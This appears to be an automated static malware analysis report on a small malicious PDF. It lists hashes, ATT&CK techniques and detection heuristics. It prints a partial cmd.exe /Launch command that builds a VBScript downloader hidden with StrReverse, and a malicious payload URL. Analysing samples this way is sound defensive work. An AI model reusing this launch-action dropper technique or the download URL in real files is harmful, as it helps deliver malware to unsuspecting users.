Malicious PDF — malware analysis report

Static analysis result for SHA-256 c977f6a6d7e0dd25…

MALICIOUS

PDF

807 B
MD5: e57364255027347ca92c78d76c3e2779 SHA-1: cbe66a223ee67525ede07c96c04ec6a950424a8a SHA-256: c977f6a6d7e0dd256858f6654d8914ba1a4209dd8abaaa326ad1d73d8331bf93
152 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1204.002 Malicious File

The PDF file contains a launch action that executes cmd.exe. This command attempts to create a VBScript file named 'm.vbs' by concatenating strings, which is then likely intended to be executed. The script itself is not fully provided, but the launch action and embedded URL strongly suggest a downloader or dropper functionality. The reconstructed command line is: cmd /c echo B="m.vbs":With CreateObject(StrReverse("PTTHLMX.2LMXSM" "Scripting.FileSystemObject" A.GetSpecialFolder(2 "WScript.Shell" 2. The embedded URL http://qopponline.info/new_aaa/tmp/m.vbs is highly suspicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • Launch action high PDF_LAUNCH
    PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • /Launch action target: cmd high PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c echo B="m.vbs":With CreateObject(StrReverse("PTTHLMX.2LMXSM"'.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://qopponline.info/new_aaa/tmp/m.vbs

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_0000006f.bin
ad55c8e83a5896a04b2012c676820daeab2b84cc539e444c6366e79f55a571c5		 pdf-embedded-script PDF decompressed stream script payload at offset 0x6F 63 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.